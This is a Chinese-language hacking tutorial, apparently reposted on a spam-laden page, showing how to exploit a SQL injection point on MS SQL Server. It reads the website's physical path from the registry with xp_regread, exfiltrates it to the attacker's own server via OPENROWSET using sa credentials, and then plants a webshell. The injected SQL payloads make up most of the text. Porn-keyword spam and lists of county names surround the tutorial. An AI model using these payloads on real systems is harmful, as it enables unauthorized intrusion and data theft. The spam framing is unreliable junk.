最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

滲透中用openrowset搞shell的方法

 更新時間:2006年12月07日 00:00:00   作者:  
滲透中用openrowset搞shell的方法 
得到SQL注入點,首先想到的是BACKUP WEBSHELL,扔在NB里跑一圈,發(fā)現(xiàn)屏蔽了SQL錯誤信息,得不到物理路徑,那還寫個PP馬了.
聯(lián)想到一個權限不是很高的命令openrowset,進行跨庫服務器查詢,就是把一個SQL命令發(fā)送到遠程數(shù)據(jù)庫,然后看返回的結果,但是要啟動事件跟蹤!我們可以把網(wǎng)站信息寫入數(shù)據(jù)庫,然后%$^%$@#$@^%$~
首先在自己機器建立SQL數(shù)據(jù)庫 

然后在對方機器上建立個表 create table [dbo].[fenggou]([cha8][char](255))--

在對方執(zhí)行 DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into fenggou (cha8) values('select a.* FROM OPENROWSET(''SQLOLEDB'',''自己的IP'';''sa'';''你的密碼'', ''select * FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''')AS a');--

這樣fenggou這個表里就會有這樣一條記錄select a.* FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密碼', 'select * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a

不用說,''D:\WEB"就是從注冊表里讀出的物理路徑拉.然后執(zhí)行DECLARE @a1 char(255) set @a1=(select cha8 FROM fenggou) exec (@a1);--

等于執(zhí)行了select a.* FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密碼', 'select * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a

OK,這時你在你機器上SQL事件追蹤器上就會顯示select * FROM pubs.dbo.authors where au_fname='D:\WEB,,1' 
哇 哈哈哈哈哈 物理路徑到手了 寫小馬傳大馬吧~ 

相關文章

最新評論

庆城县| 万宁市| 鹿泉市| 福泉市| 韩城市| 龙胜| 秭归县| 揭西县| 工布江达县| 洮南市| 武乡县| 白银市| 翁源县| 孙吴县| 迭部县| 双牌县| 松潘县| 胶州市| 宁河县| 斗六市| 辽阳市| 淳安县| 镇安县| 龙州县| 昌江| 昭平县| 仙游县| 黎平县| 望都县| 淮安市| 玉林市| 金平| 通河县| 泉州市| 汉寿县| 岑巩县| 碌曲县| 伊吾县| 姚安县| 洛川县| 新源县|